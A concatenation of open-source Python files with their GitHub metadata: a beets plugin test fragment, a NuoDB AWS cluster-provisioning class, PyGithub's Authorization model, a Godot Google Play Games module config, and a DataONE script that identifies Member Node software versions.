# Both queries are blocked by AND clause with unmatched condition.
match_pattern = ["album:notthis genre:testgenre",
"artist:testartist album:notthis"]
self.assertFalse(IHatePlugin.do_i_hate_this(task, match_pattern))
# Only one query should fire.
match_pattern = ["album:testalbum genre:testgenre",
"artist:testartist album:notthis"]
self.assertTrue(IHatePlugin.do_i_hate_this(task, match_pattern))
def suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
{
"content_hash": "7c85e09a843518c59971e18830229705",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 74,
"avg_line_length": 34.44,
"alnum_prop": 0.648664343786295,
"repo_name": "accesso/beets",
"id": "b9c6eb114a8dc1cb2101d40214fb09b7474a1c6b",
"size": "1722",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/test_ihate.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
'''
Created on Jan 28, 2014
@author: rkourtz
'''
import boto.route53
import nuodbTools.aws
import inspect, json, os, random, string, sys, time
class Cluster:
def __init__(self,
alert_email = "alert@example.com",
aws_access_key = "",
aws_secret = "",
brokers_per_zone = 2,
cluster_name = "default",
data_dir = "/".join([os.path.dirname(os.path.abspath(inspect.stack()[-1][1])), "data"]),
dns_domain="",
domain_name="domain",
domain_password="bird",
enable_monitoring = True,
instance_type = "m3.large",
nuodb_license = "",
ssh_key = "",
ssh_keyfile = None):
self.route53 = boto.route53.connection.Route53Connection(aws_access_key_id=aws_access_key, aws_secret_access_key=aws_secret)
args, _, _, values = inspect.getargvalues(inspect.currentframe())
for i in args:
setattr(self, i, values[i])
if ssh_keyfile != None and ssh_keyfile != "":
if not os.path.exists(ssh_keyfile):
raise Error("Can not find ssh private key %s" % self.ssh_keyfile)
if dns_domain == None or dns_domain == "None" or dns_domain == "":
self.dns_domain = "NuoDB"
self.dns_emulate = True
else:
self.dns_emulate = False
self.db = {}
self.zones = {} #store our zone connections
def add_host(self, name, zone, ami = "", security_group_ids=[], subnets = [], agentPort = 48004 , subPortRange = 48005, nuodb_rpm_url = None, start_services = True):
if zone not in self.zones:
raise Error("You must connect to a zone first before you can add a host in that zone")
if len(subnets) == 0:
raise Error("You must specify the target subnets in an array")
# make sure ami is valid
valid_amis = []
for each_ami in self.zones[zone].amis:
valid_amis.append(each_ami.id)
if ami not in valid_amis:
raise Error("ami '%s' is not valid" % (ami))
stub = self.db['customers'][self.cluster_name]['zones'][zone]['hosts']
if name == None:
increment = len(stub)
basename = "db"+str(increment)
else:
basename = name
increment = random.randrange(0,len(subnets))
host = ".".join([basename, self.cluster_name, zone, self.dns_domain])
if host not in stub:
stub[host] = {}
# Generate data for chef... is it a broker? peers?
agent_addr = host
if "zones" not in self.db['customers'][self.cluster_name]:
self.db['customers'][self.cluster_name]['zones'] = {}
if zone not in self.db['customers'][self.cluster_name]['zones']:
self.db['customers'][self.cluster_name]['zones'][zone] = {"brokers": []}
if "chef_data" not in stub[host]:
if len(self.db['customers'][self.cluster_name]['zones'][zone]['brokers']) < 1:
isBroker = True
chef_data = {"nuodb": {"is_broker": True, "enableAutomation": True, "enableAutomationBootstrap": True, "autoconsole": {"brokers": ["localhost"]}, "webconsole": {"brokers": ["localhost"]}}}
#self.db['customers'][self.cluster_name]['brokers'] = [agent_addr]
self.db['customers'][self.cluster_name]['zones'][zone]['brokers'] =[agent_addr]
elif len(self.db['customers'][self.cluster_name]['zones'][zone]['brokers']) < int(self.brokers_per_zone):
isBroker = True
chef_data = {"nuodb": {"is_broker": True, "enableAutomation": True, "enableAutomationBootstrap": False, "autoconsole": {"brokers": ["localhost"]}, "webconsole": {"brokers": ["localhost"]}}}
#self.db['customers'][self.cluster_name]['brokers'].append(agent_addr)
self.db['customers'][self.cluster_name]['zones'][zone]['brokers'].append(agent_addr)
else:
isBroker = False
chef_data = {"nuodb": {"is_broker": False, "enableAutomation": True, "enableAutomationBootstrap": False}}
#common Chef information
chef_data["run_list"] = ["recipe[nuodb]"]
chef_data['nuodb']["port"] = agentPort
chef_data['nuodb']["portRange"] = subPortRange
chef_data["nuodb"]['automationTemplate'] = "Minimally Redundant"
chef_data["nuodb"]['altAddr'] = "" # Populate this at boot time
chef_data["nuodb"]['region'] = zone
if self.alert_email != None and "@" in self.alert_email:
chef_data["nuodb"]['monitoring'] = {"enable": True, "alert_email": self.alert_email}
else:
chef_data["nuodb"]['monitoring'] = {"enable": False, "alert_email": ""}
chef_data['nuodb']['license'] = self.nuodb_license
chef_data["nuodb"]['domain_name'] = self.domain_name
chef_data["nuodb"]['domain_password'] = self.domain_password
if nuodb_rpm_url != None:
chef_data["nuodb"]["download_url"] = nuodb_rpm_url
chef_data["nuodb"]["start_services"] = start_services
stub[host]['chef_data'] = chef_data
else:
isBroker = stub[host]['chef_data']['nuodb']['is_broker']
stub[host]['ami'] = ami
stub[host]['security_group_ids'] = security_group_ids
stub[host]['subnet'] = subnets[len(stub) % len(subnets)]
stub[host]['obj'] = nuodbTools.aws.Host(host, ec2Connection=self.zones[zone].connection,
Route53Connection=self.route53, dns_domain=self.dns_domain,
domain = self.domain_name, domainPassword = self.domain_password,
advertiseAlt = True, region = zone,
agentPort = agentPort, portRange = subPortRange,
isBroker = isBroker, ssh_key = self.ssh_key, ssh_keyfile = self.ssh_keyfile)
return host
def __boot_host(self, host, zone, instance_type = None, wait_for_health = False, ebs_optimized = False):
if instance_type == None:
instance_type = self.instance_type
stub = self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host]
template_vars = dict(
hostname = host,
chef_json = json.dumps(stub['chef_data']),
email_address = self.alert_email
)
f = open("/".join([os.path.dirname(os.path.abspath(inspect.stack()[0][1])), "templates", "init.py"]))
template = string.Template(f.read())
f.close()
userdata = template.substitute(template_vars)
obj = stub['obj'].create(ami=stub['ami'], instance_type=instance_type, security_group_ids=stub['security_group_ids'], subnet = stub['subnet'], getPublicAddress = True, userdata = userdata, ebs_optimized=ebs_optimized)
print ("Waiting for %s to start" % obj.name),
if obj.status() != "running":
print("."),
time.sleep(30) #Wait 30 seconds in between node starts
print
obj.update_data()
if not self.dns_emulate:
print "Setting DNS for %s " % obj.name
obj.dns_set()
if wait_for_health:
healthy = False
count = 0
tries = 60
wait = 10
print "Waiting for agent on %s (%s)" % (obj.name, obj.ext_ip)
while not healthy and count < tries:
if obj.agent_running():
healthy = True
else:
print("."),
time.sleep(wait)
count += 1
if not healthy:
print "Cannot reach agent on %s after %s seconds. Check firewalls and the host for errors." % (obj.name, str(tries * wait))
exit(1)
print
else:
print "Not waiting for agent on %s, node will come up asynchronously." % obj.name
return obj
def connect_zone(self, zone):
self.zones[zone] = nuodbTools.aws.Zone(zone)
self.zones[zone].connect(aws_access_key=self.aws_access_key, aws_secret=self.aws_secret)
if "customers" not in self.db:
self.db['customers'] = {}
if self.cluster_name not in self.db['customers']:
self.db['customers'][self.cluster_name] = {"zones": {}, "brokers": []}
if zone not in self.db['customers'][self.cluster_name]['zones']:
self.db['customers'][self.cluster_name]['zones'][zone] = {"hosts": {}, "brokers": []}
def create_cluster(self, ebs_optimized = False):
for host in self.get_hosts():
obj = self.get_host(host)['obj']
zone = obj.region
wait_for_health = False
if obj.isBroker == True:
# If this node is a broker, then pair it with brokers outside its region if you can
wait_for_health = True
brokers = []
for idx, azone in enumerate(self.get_zones()):
if azone != zone:
for broker in self.db['customers'][self.cluster_name]['zones'][azone]['brokers']:
brokers.append(broker)
if len(brokers) == 0:
# No brokers were found in other regions. Add another peer from this region if there is one
brokers = self.db['customers'][self.cluster_name]['zones'][zone]['brokers']
else:
#If this node isn't a broker pair it with local zone brokers
brokers = self.db['customers'][self.cluster_name]['zones'][zone]['brokers']
print "%s: Setting peers to [%s]" % (host, ",".join(brokers))
self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host]['chef_data']['nuodb']['brokers'] = brokers
self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host]['chef_data']['nuodb']['autoconsole'] = {"brokers": brokers}
self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host]['chef_data']['nuodb']['webconsole']= {"brokers": brokers}
self.__boot_host(host, zone, wait_for_health = wait_for_health, ebs_optimized = ebs_optimized)
if self.dns_emulate:
self.set_dns_emulation()
def delete_db(self):
self.exit()
if os.path.exists(self.database_file):
os.remove(self.database_file)
def delete_dns(self, zone = None):
if zone == None:
zones = self.get_zones()
else:
zones = [zone]
for zone in zones:
hosts = self.get_hosts(zone=zone)
for host in hosts:
host_obj = self.get_host(host)['obj']
host_obj.dns_delete()
def dump_db(self):
return self.db
def get_brokers(self):
try:
brokers = []
for zone in self.get_zones():
for broker in self.db['customers'][self.cluster_name]['zones'][zone]['brokers']:
if self.dns_emulate:
brokers.append(self.get_host(broker)['obj'].ext_ip)
else:
brokers.append(broker)
return brokers
except:
return []
def get_host(self, host_id):
split= host_id.split(".")
customer = split[1]
zone = split[2]
if host_id in self.db['customers'][customer]['zones'][zone]['hosts']:
return self.db['customers'][customer]['zones'][zone]['hosts'][host_id]
else:
raise Error("No host found with id of '%s'" % host_id)
def get_host_address(self, host_id):
split= host_id.split(".")
customer = split[1]
zone = split[2]
if host_id in self.db['customers'][customer]['zones'][zone]['hosts']:
if self.dns_emulate:
return self.db['customers'][customer]['zones'][zone]['hosts'][host_id]['obj'].ext_ip
else:
return self.db['customers'][customer]['zones'][zone]['hosts'][host_id]['obj'].name
else:
raise Error("No host found with id of '%s'" % host_id)
def get_hosts(self, zone = None):
hosts = []
if zone == None:
zones = self.get_zones()
else:
zones=[zone]
for zone in zones:
for host in self.db['customers'][self.cluster_name]['zones'][zone]['hosts']:
hosts.append(host)
return sorted(hosts)
def get_zones(self):
zones = []
for zone in self.db['customers'][self.cluster_name]['zones']:
zones.append(zone)
return sorted(zones)
def set_dns_emulation(self):
host_list = []
for host_id in self.get_hosts():
host = self.get_host(host_id)['obj']
host.update_data()
print("Waiting for an IP for %s" % host.name),
while host.ext_ip == None or len(host.ext_ip) == 0:
print ("."),
time.sleep(5)
host.update_data()
print("got %s" % host.ext_ip)
host_list.append([host.name, host.ext_ip])
for host_id in self.get_hosts():
host = self.get_host(host_id)
obj = host['obj']
print ("Waiting for ssh on %s." % obj.name),
count = 60
while not obj.is_port_available(22) and count >= 0:
print ("."),
time.sleep(5)
count -= 1
print
if count == 0:
print "ERROR: Gave up on %s after %d seconds because it could not be contacted. This server may not work properly." % (obj.name, 60*5)
else:
print ("Setting /etc/hosts on %s..." % obj.name)
command = "cat /etc/hosts"
(rc, etc_hosts_before, stderr) = obj.execute_command(command)
for line in host_list:
hostname = line[0]
ip = line[1]
command = "sudo awk -v s=\"%s %s\" '/%s/{f=1;$0=s}7;END{if(!f)print s}' /etc/hosts > /tmp/hosts && sudo chown root:root /tmp/hosts && sudo chmod 644 /tmp/hosts && sudo mv /tmp/hosts /etc/hosts" % (ip, hostname, hostname)
(rc, stdout, stderr) = obj.execute_command(command)
if rc != 0:
print "Unable to set DNS emulation for %s: %s" % (obj.name, stderr)
command = "cat /etc/hosts"
(rc, etc_hosts_after, stderr) = obj.execute_command(command)
if host['chef_data']['nuodb']['start_services'] and etc_hosts_before != etc_hosts_after:
print "Restarting services..."
count = 5
ok = False
while count != 0 and not ok:
try:
obj.agent_action(action = "restart")
ok=True
except:
time.sleep(5)
count -= 1
if count == 0:
raise
count = 5
ok = False
while count != 0 and not ok:
try:
obj.webconsole_action(action = "restart")
ok=True
except:
time.sleep(5)
count -= 1
if count == 0:
raise
count = 5
ok = False
while count != 0 and not ok:
try:
obj.autoconsole_action(action = "restart")
ok=True
except:
time.sleep(5)
count -= 1
if count == 0:
raise
def terminate_hosts(self, zone = None):
if zone == None:
zones = self.get_zones()
else:
zones = [zone]
for zone in zones:
hosts = self.get_hosts(zone=zone)
for host in hosts:
host_obj = self.get_host(host)['obj']
if host_obj.exists:
print "Terminating %s" % host
host_obj.terminate()
del self.db['customers'][self.cluster_name]['zones'][zone]['hosts'][host_obj.name]
for idx, broker in enumerate(self.db['customers'][self.cluster_name]['brokers']):
if zone in broker:
del self.db['customers'][self.cluster_name]['brokers'][idx]
class Error(Exception):
pass
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
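def _example_cluster_build():
    """Illustrative sketch (not part of the original module): bring up a small
    NuoDB cluster in one AWS region. Every value below (keys, region, AMI,
    subnet, security-group IDs and file paths) is a made-up placeholder; the
    method calls are the ones defined on Cluster above."""
    cluster = Cluster(aws_access_key="AKIA...", aws_secret="...",
                      cluster_name="demo", dns_domain="example.com",
                      ssh_key="demo-key", ssh_keyfile="/path/to/demo-key.pem",
                      nuodb_license="...")
    cluster.connect_zone("us-east-1")
    for i in range(3):
        cluster.add_host(name="db%d" % i, zone="us-east-1", ami="ami-00000000",
                         security_group_ids=["sg-00000000"],
                         subnets=["subnet-00000000"])
    cluster.create_cluster()
    print "Brokers:", cluster.get_brokers()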
|
{
"content_hash": "6c6fe9f38002ab5e19fe141efbff9326",
"timestamp": "",
"source": "github",
"line_count": 372,
"max_line_length": 235,
"avg_line_length": 43.27150537634409,
"alnum_prop": 0.5496676399329068,
"repo_name": "nuodb/nuodbTools",
"id": "4c30234356a4113c49d39887ae04040a38838d25",
"size": "16097",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nuodbTools/cluster/cluster.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "175017"
}
],
"symlink_target": ""
}
|
import github.GithubObject
import github.AuthorizationApplication
class Authorization(github.GithubObject.CompletableGithubObject):
"""
This class represents Authorizations as returned for example by http://developer.github.com/v3/todo
"""
@property
def app(self):
"""
:type: :class:`github.AuthorizationApplication.AuthorizationApplication`
"""
self._completeIfNotSet(self._app)
return self._app.value
@property
def created_at(self):
"""
:type: datetime.datetime
"""
self._completeIfNotSet(self._created_at)
return self._created_at.value
@property
def id(self):
"""
:type: integer
"""
self._completeIfNotSet(self._id)
return self._id.value
@property
def note(self):
"""
:type: string
"""
self._completeIfNotSet(self._note)
return self._note.value
@property
def note_url(self):
"""
:type: string
"""
self._completeIfNotSet(self._note_url)
return self._note_url.value
@property
def scopes(self):
"""
:type: list of string
"""
self._completeIfNotSet(self._scopes)
return self._scopes.value
@property
def token(self):
"""
:type: string
"""
self._completeIfNotSet(self._token)
return self._token.value
@property
def updated_at(self):
"""
:type: datetime.datetime
"""
self._completeIfNotSet(self._updated_at)
return self._updated_at.value
@property
def url(self):
"""
:type: string
"""
self._completeIfNotSet(self._url)
return self._url.value
def delete(self):
"""
:calls: `DELETE /authorizations/:id <http://developer.github.com/v3/oauth>`_
:rtype: None
"""
headers, data = self._requester.requestJsonAndCheck(
"DELETE",
self.url
)
def edit(self, scopes=github.GithubObject.NotSet, add_scopes=github.GithubObject.NotSet, remove_scopes=github.GithubObject.NotSet, note=github.GithubObject.NotSet, note_url=github.GithubObject.NotSet):
"""
:calls: `PATCH /authorizations/:id <http://developer.github.com/v3/oauth>`_
:param scopes: list of string
:param add_scopes: list of string
:param remove_scopes: list of string
:param note: string
:param note_url: string
:rtype: None
"""
assert scopes is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in scopes), scopes
assert add_scopes is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in add_scopes), add_scopes
assert remove_scopes is github.GithubObject.NotSet or all(isinstance(element, (str, unicode)) for element in remove_scopes), remove_scopes
assert note is github.GithubObject.NotSet or isinstance(note, (str, unicode)), note
assert note_url is github.GithubObject.NotSet or isinstance(note_url, (str, unicode)), note_url
post_parameters = dict()
if scopes is not github.GithubObject.NotSet:
post_parameters["scopes"] = scopes
if add_scopes is not github.GithubObject.NotSet:
post_parameters["add_scopes"] = add_scopes
if remove_scopes is not github.GithubObject.NotSet:
post_parameters["remove_scopes"] = remove_scopes
if note is not github.GithubObject.NotSet:
post_parameters["note"] = note
if note_url is not github.GithubObject.NotSet:
post_parameters["note_url"] = note_url
headers, data = self._requester.requestJsonAndCheck(
"PATCH",
self.url,
input=post_parameters
)
self._useAttributes(data)
def _initAttributes(self):
self._app = github.GithubObject.NotSet
self._created_at = github.GithubObject.NotSet
self._id = github.GithubObject.NotSet
self._note = github.GithubObject.NotSet
self._note_url = github.GithubObject.NotSet
self._scopes = github.GithubObject.NotSet
self._token = github.GithubObject.NotSet
self._updated_at = github.GithubObject.NotSet
self._url = github.GithubObject.NotSet
def _useAttributes(self, attributes):
if "app" in attributes: # pragma no branch
self._app = self._makeClassAttribute(github.AuthorizationApplication.AuthorizationApplication, attributes["app"])
if "created_at" in attributes: # pragma no branch
self._created_at = self._makeDatetimeAttribute(attributes["created_at"])
if "id" in attributes: # pragma no branch
self._id = self._makeIntAttribute(attributes["id"])
if "note" in attributes: # pragma no branch
self._note = self._makeStringAttribute(attributes["note"])
if "note_url" in attributes: # pragma no branch
self._note_url = self._makeStringAttribute(attributes["note_url"])
if "scopes" in attributes: # pragma no branch
self._scopes = self._makeListOfStringsAttribute(attributes["scopes"])
if "token" in attributes: # pragma no branch
self._token = self._makeStringAttribute(attributes["token"])
if "updated_at" in attributes: # pragma no branch
self._updated_at = self._makeDatetimeAttribute(attributes["updated_at"])
if "url" in attributes: # pragma no branch
self._url = self._makeStringAttribute(attributes["url"])
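# ---------------------------------------------------------------------------
# Illustrative sketch (not part of PyGithub itself): how an Authorization
# instance obtained from the (since-deprecated) GitHub OAuth authorizations
# API might be modified and removed with the methods defined above. Obtaining
# `auth` is left abstract because the retrieval call depends on the PyGithub
# version in use.
#
#     auth = ...  # an Authorization instance returned by the library
#     auth.edit(add_scopes=["repo"], note="CI token")
#     auth.delete()
# ---------------------------------------------------------------------------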
|
{
"content_hash": "86b69127ffb447e4fbeb99dcc78ef1a7",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 205,
"avg_line_length": 36.67741935483871,
"alnum_prop": 0.6197009674582233,
"repo_name": "ARMmbed/yotta_osx_installer",
"id": "b1ff7314d419bc7ace04f0b92f17c38f7319db59",
"size": "7574",
"binary": false,
"copies": "71",
"ref": "refs/heads/master",
"path": "workspace/lib/python2.7/site-packages/github/Authorization.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "46"
},
{
"name": "Assembly",
"bytes": "29493"
},
{
"name": "Batchfile",
"bytes": "1321"
},
{
"name": "C",
"bytes": "3589917"
},
{
"name": "C++",
"bytes": "10603800"
},
{
"name": "CMake",
"bytes": "2408460"
},
{
"name": "CSS",
"bytes": "17863"
},
{
"name": "Emacs Lisp",
"bytes": "14305"
},
{
"name": "FORTRAN",
"bytes": "2105"
},
{
"name": "Groff",
"bytes": "3889491"
},
{
"name": "HTML",
"bytes": "31505361"
},
{
"name": "JavaScript",
"bytes": "90647"
},
{
"name": "Logos",
"bytes": "8877"
},
{
"name": "Makefile",
"bytes": "2798"
},
{
"name": "Objective-C",
"bytes": "254392"
},
{
"name": "Python",
"bytes": "7903768"
},
{
"name": "Shell",
"bytes": "36795"
},
{
"name": "VimL",
"bytes": "8478"
},
{
"name": "XC",
"bytes": "8384"
},
{
"name": "XS",
"bytes": "8334"
}
],
"symlink_target": ""
}
|
def can_build(plat):
return plat == 'android'
def configure(env):
if env['platform'] == 'android':
env.android_add_dependency("compile 'com.google.android.gms:play-services-plus:9.8.0'")
env.android_add_dependency("compile 'com.google.android.gms:play-services-drive:9.8.0'")
env.android_add_dependency("compile 'com.google.android.gms:play-services-games:9.8.0'")
env.android_add_java_dir("android")
env.android_add_to_manifest("android/AndroidManifestChunk.xml")
env.disable_module()
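# Illustrative note (sketch, not part of the module): with this config.py in a
# "modules/<name>/" directory of the Godot source tree, building the Android
# export templates (for example `scons platform=android target=release`) calls
# can_build() for each module and, when it returns True, configure(env), which
# here adds the play-services Gradle dependencies, the extra Java sources and
# the AndroidManifest chunk listed above.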
|
{
"content_hash": "3df9497cc07c941940e8541dfe59007a",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 96,
"avg_line_length": 49.36363636363637,
"alnum_prop": 0.6795580110497238,
"repo_name": "jlopezcur/GodotGooglePlayGameServices",
"id": "90a3a661f546c312e54e393868386ec43f541900",
"size": "543",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "gpgs/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "GDScript",
"bytes": "1257"
},
{
"name": "Java",
"bytes": "46248"
},
{
"name": "Python",
"bytes": "543"
}
],
"symlink_target": ""
}
|
"""Find the software stack and version for each MN in a DataONE environment.
The results are printed to stdout and written to a CSV file.
The MNs are checked concurrently, while checks are issued to each MN serially. This
gives each MN the most time to return something sensible but does end up slowing down
the script, since it ends up waiting until timeout for each check against dead nodes.
"""
import asyncio
import csv
import logging
import re
import ssl
import sys
import aiohttp
import bs4
import d1_scimeta.util
import d1_common.env
import d1_common.url
import d1_common.util
import d1_common.utils.ulog
import d1_common.wrap.simple_xml
import d1_client.cnclient_2_0
import d1_client.command_line
TIMEOUT_SECONDS = 30
RESULT_CSV_PATH = "./node_versions.csv"
# Max number of lines to log from unrecognized response body
MAX_RESPONSE_LINE_COUNT = 10
log = logging.getLogger(__name__)
def main():
"""Sync wrapper of main() for use by d1_util.setup() to generate console entry
points."""
sys.exit(asyncio.run(_main()))
async def _main():
parser = d1_client.command_line.D1ClientArgParser(__doc__)
parser.add_argument(
"csv_path",
nargs="?",
default=RESULT_CSV_PATH,
help="Save path for version information CSV file",
)
parser.add_argument(
"--max_response_lines",
"-m",
type=int,
default=MAX_RESPONSE_LINE_COUNT,
help="Max number of lines to log from unrecognized response body",
)
parser.add_argument(
"--only",
"-n",
nargs="*",
default=[],
metavar="regex",
help="Only check nodes with baseURL matching regex",
)
args = parser.parse_args()
d1_client.command_line.log_setup(args.debug)
args_dict = parser.get_method_args(args)
cn_base_url = args_dict["base_url"]
node_list_pyxb = get_node_list_pyxb(cn_base_url)
base_url_list = get_eligible_base_url_list(node_list_pyxb)
if args.only:
base_url_list = filter_by_rx_list(args.only, base_url_list)
log.info("Node count: {}".format(len(base_url_list)))
if not base_url_list:
return 1
log.info("Creating one type/version task per node")
task_set = set()
result_list = []
async with aiohttp.ClientSession(
timeout=aiohttp.ClientTimeout(total=TIMEOUT_SECONDS)
) as session:
for base_url in base_url_list:
log.info(f'Adding node. base_url="{base_url}"')
task_set.add(get_node_type_and_version(session, base_url))
log.info("Processing tasks")
while True:
done_set, task_set = await asyncio.wait(
task_set, return_when=asyncio.FIRST_COMPLETED
)
log.info("Task completed. Remaining tasks: {}".format(len(task_set)))
for task in done_set:
result_list.append(task.result())
if not task_set:
break
log.info("Saving results")
tidy_list = get_tidy_list(result_list)
print_result(tidy_list)
write_result_csv(args.csv_path, tidy_list)
log.info("Wrote result to: {}".format(args.csv_path))
async def get_node_type_and_version(session, base_url):
"""Try software stack type and version extraction algorithms on MN until one is
successful or all have been tried.
If none are successful, return the status code and response body from the last
failed attempt.
Args:
session: aiohttp.ClientSession
base_url: Member Node BaseURL
Returns:
If successful:
baseURL of recognized MN: str
type of MN: str ("GMN" or "Metacat")
software stack version: str
"""
gmn_version_str = await get_gmn_version(session, base_url)
if gmn_version_str:
return base_url, "GMN", gmn_version_str
if await is_v1_gmn(session, base_url):
return base_url, "GMN", "1.x.x"
metacat_version_str = await get_metacat_version(session, base_url)
if metacat_version_str:
return base_url, "Metacat", metacat_version_str
base_url, status_int, result_str = await check_api_endpoints(session, base_url)
log.debug("Received result: {}".format(base_url))
return base_url, status_int, result_str
async def get_gmn_version(session, base_url):
"""Get version number returned from /home by GMN 1.x / 2.x / 3.x.
Args:
session:
base_url (): The BaseURL of a node that may be a GMN instance.
Returns:
None: The node at base_url is not a functional GMN instance
str: The node at base_url is a functional GMN instance running the returned version.
"""
home_url = d1_common.url.joinPathElements(base_url, "home")
log.info("Checking for GMN: {}".format(base_url))
status, body_str = await get(session, home_url)
if status in (200, 401):
version_str = await get_gmn_1x_2x_version(body_str)
if version_str:
return version_str
version_str = await get_gmn_3x_version(body_str)
if version_str:
return version_str
dump_response_body("/home exists but returned unrecognized response", body_str)
async def get_gmn_1x_2x_version(html_str):
"""Get version number from HTML returned from /home by GMN 1.x / 2.x.
GMN 1.x / 2.x /home endpoint returns HTML which must be scraped for the version
number.
Args:
html_str: HTTP body that may be HTML returned from a GMN 1.x / 2.x instance.
Returns:
None: ``html_str`` is not valid HTML from a GMN 1.x / 2.x instance.
str: ``html_str`` is from a GMN 1.x / GMN 2.x instance running the returned
version.
"""
try:
soup = bs4.BeautifulSoup(html_str, "html.parser")
return soup.find(string="GMN version:").find_next("td").string
except AttributeError:
pass
async def get_gmn_3x_version(xml_str):
"""Get version number from XML returned from /home by GMN 3.x.
GMN 3.x /home endpoint returns well formed XML containing version numbers for
components in the stack.
Returns:
None: ``xml_str`` is not valid XML from a GMN 3.x instance.
str: ``xml_str`` is from a GMN 3.x instance running the returned version
XML fragment:
<value name="gmnVersion">3.4.2</value>
"""
try:
with d1_common.wrap.simple_xml.wrap(xml_str) as xml:
return xml.get_element_by_xpath('//value[@name="gmnVersion"]')[0].text
except (d1_common.wrap.simple_xml.SimpleXMLWrapperException, IndexError):
pass
async def is_v1_gmn(session, base_url):
"""Detect GMN v1 where version cannot be determined due to access restricted
ObjectList, 500 ServiceFailure or other issues.
Args:
session:
base_url: str
The BaseURL of a node that may be a GMN v1 instance.
Returns:
bool: True if the response body looks like the GMN v1 home page.
"""
status, body_str = await get(session, base_url)
return '<h3><font style="color:red">' in (body_str or "")
async def get_metacat_version(session, base_url):
"""
Args:
session:
base_url: The BaseURL of a node that may be a Metacat instance.
Returns:
None: The node at base_url is not a functional Metacat instance.
str: The node at base_url is a functional Metacat instance running the returned version.
"""
log.info("Checking for Metacat: {}".format(base_url))
# Drop the DataONE ".../d1/mn" path suffix (if present) to reach the native
# Metacat servlet; str.strip() removes a character set rather than a suffix,
# so use an explicit suffix check.
metacat_root_url = base_url[:-len("/d1/mn")] if base_url.endswith("/d1/mn") else base_url
metacat_version_url = metacat_root_url + "/metacat?action=getversion"
status, body_str = await get(session, metacat_version_url)
if status == 200:
xml_tree = d1_scimeta.util.parse_xml_bytes(body_str.encode("utf-8"))
# d1_scimeta.util.dump_pretty_tree(xml_tree)
return xml_tree.getroot().text
async def check_api_endpoints(session, base_url):
"""Check for recognizable response from: v1/node, v2/node, v2/object, v1/object,
baseURL.
To maximize the chance of receiving a response, the endpoints are checked serially
instead of concurrently.
Endpoints are checked in the order listed. If valid response is received,
information about the successful request is returned and later endpoints are not
checked.
If no checks are successful, result from the last unsuccessful check is returned.
    Note:
        This function takes up most of the run time. It typically waits until the
        timeout expires for each of the checked endpoints, so the total run time of
        the script is roughly the timeout multiplied by the number of checked
        endpoints.
"""
status_int = "?"
for check_str in "v1/node", "v2/node", "v2/object", "v1/object", "/":
api_url = d1_common.url.joinPathElements(base_url, check_str)
log.info("Checking unknown: {}".format(api_url))
status, body_str = await get(session, api_url)
if status in (200, 401):
break
return base_url, status_int, f"{check_str}={body_str}"
async def get(session, url):
"""Wrapper for session.get() that returns None if the HTTP GET call failed.
Args:
session:
url:
Returns:
2-tup
status_code: int
body_str: str
"""
try:
async with session.get(url, ssl=False) as response:
return response.status, await response.text()
except (
ssl.SSLError,
asyncio.TimeoutError,
ConnectionError,
aiohttp.ClientConnectorError,
):
return None, None
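# Illustrative driver for the wrapper above (not part of the original utility;
# the timeout value is an arbitrary assumption):
async def _probe_one_sketch(url):
    timeout = aiohttp.ClientTimeout(total=60)
    async with aiohttp.ClientSession(timeout=timeout) as session:
        return await get(session, url)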
def filter_by_rx_list(rx_list, base_url_list):
filtered_base_url_set = set()
for rx in rx_list:
for base_url in base_url_list:
if re.search(rx, base_url):
if base_url not in filtered_base_url_set:
log.debug(f"Including node selected by regex: {rx}: {base_url}")
filtered_base_url_set.add(base_url)
return sorted(filtered_base_url_set)
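# Hypothetical example of the regex include-filter above (URLs are invented):
def _filter_by_rx_list_example():
    base_url_list = [
        "https://node1.example.edu/mn",
        "https://gmn.example.org/mn",
        "https://other.example.net/mn",
    ]
    # Keeps only URLs matching at least one regex, de-duplicated and sorted.
    return filter_by_rx_list([r"\.edu/", r"example\.org"], base_url_list)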
def get_tidy_list(response_list):
def trim(v):
return " / ".join(str(v).splitlines())[:80]
return [
(trim(v[1]), trim(v[2]), trim(v[0]))
for v in sorted(response_list, key=lambda x: (str(x[1]), x[2], x[0]))
]
def print_result(tidy_list):
for row_list in tidy_list:
log.info("{:<10} {:<10} {}".format(row_list[0], row_list[1], row_list[2]))
def write_result_csv(result_csv_path, tidy_list):
with open(result_csv_path, "w") as csv_file:
csv_writer = csv.writer(csv_file, quoting=csv.QUOTE_MINIMAL)
csv_writer.writerow(
[
"node_type or status code",
"version or first line of unrecognized html body",
"base_url",
]
)
for row_list in tidy_list:
csv_writer.writerow(row_list)
def get_node_list_pyxb(cn_base_url):
client = d1_client.cnclient_2_0.CoordinatingNodeClient_2_0(cn_base_url)
return client.listNodes()
def get_eligible_base_url_list(node_list_pyxb):
eligible_base_url_list = []
for node_pyxb in node_list_pyxb.node:
if node_pyxb.type == "cn":
log.debug("Skipping CN: {}".format(node_pyxb.baseURL))
elif node_pyxb.state != "up":
log.debug(
f'Skipping node with state "{node_pyxb.state}": {node_pyxb.baseURL}'
)
else:
eligible_base_url_list.append(node_pyxb.baseURL)
return eligible_base_url_list
def dump_response_body(msg_str, body_str):
log.warning(f"{msg_str}:")
for i, line in enumerate(body_str.splitlines(keepends=False)):
if i == MAX_RESPONSE_LINE_COUNT:
log.warning(" <skipped rest of response body>")
break
log.warning(" {:>4} {}".format(i + 1, line))
